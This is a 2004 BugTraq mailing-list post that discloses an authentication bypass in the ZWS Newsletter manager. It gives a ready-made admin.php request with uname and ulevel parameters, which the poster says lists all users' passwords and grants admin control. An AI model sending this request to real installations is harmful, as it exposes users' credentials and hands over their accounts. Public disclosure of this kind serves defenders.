BugTraq
Back to list
|
Post reply
ZWS Newsletter & Mailing List Manager
Jun 24 2004 06:07PM
GaMeS GaMeS (bzh_mrim yahoo fr)
hello , i'm a frenchy boy and excuse me for my bad english...
i decover a bug in the newsletter ZWS ,
http://www.target.com/newsletter/admin.php?f=list_user&uname=test&ulevel
=1
with this , you can list all user register in the newsletter with respective password.
after u log with a account Admin , u can create User , delete user , etc...
The variable "uname=test" define the nick to connect ,
"ulevel=1" define the level of this nick but 1 is Admin account.
if u want more explication , reply ;)
Bye
GaMeS
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
hello , i'm a frenchy boy and excuse me for my bad english...
i decover a bug in the newsletter ZWS ,
http://www.target.com/newsletter/admin.php?f=list_user&uname=test&ulevel
=1
with this , you can list all user register in the newsletter with respective password.
after u log with a account Admin , u can create User , delete user , etc...
The variable "uname=test" define the nick to connect ,
"ulevel=1" define the level of this nick but 1 is Admin account.
if u want more explication , reply ;)
Bye
GaMeS
[ reply ]